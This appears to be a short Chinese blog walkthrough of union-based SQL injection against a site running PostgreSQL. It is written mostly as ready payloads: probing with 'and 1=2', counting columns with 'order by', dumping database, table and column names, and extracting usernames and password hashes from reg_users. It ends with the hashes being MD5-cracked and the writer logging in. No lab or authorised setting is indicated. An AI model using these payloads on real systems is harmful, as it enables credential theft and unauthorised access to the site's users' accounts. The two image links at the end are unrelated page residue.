判断注入点
and 1=2
判断回显点
order 不用 4 页面正常
order by 5 页面异常,得出只存在四个字段
测试回显位置
and 1=2 union select 'null',null,null,null
and 1=2 union select null,'null',null,null
and 1=2 union select null,null,'null',null
and 1=2 union select null,null,null,'null'
看到当null在第二位和第三位有回显
得到回显位置了,那么我们就可以根据回显点查询其他信息了
查库名
如下这条语句查出四条库名
and 1=2 union select null,null,string_agg(datname,','),null from pg_database
查表名
and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
查字段
这里我们先查user表的字段
and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
查出表中字段的所有数据
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
md5解密
得到账号密码,用md5解密
这里第一个账户显示已禁用我们继续解密下一条密码
好了这里我们就登录进去了
![[数据集][目标检测]街灯路灯检测数据集VOC+YOLO格式1893张1类别](https://i-blog.csdnimg.cn/direct/ad3532845c834a06bc2863a9ba997498.png)
![[Linux#47][网络] 网络协议 | TCP/IP模型 | 以太网通信](https://i-blog.csdnimg.cn/direct/1783339e86994d6ba4c8eda6b9075588.png)
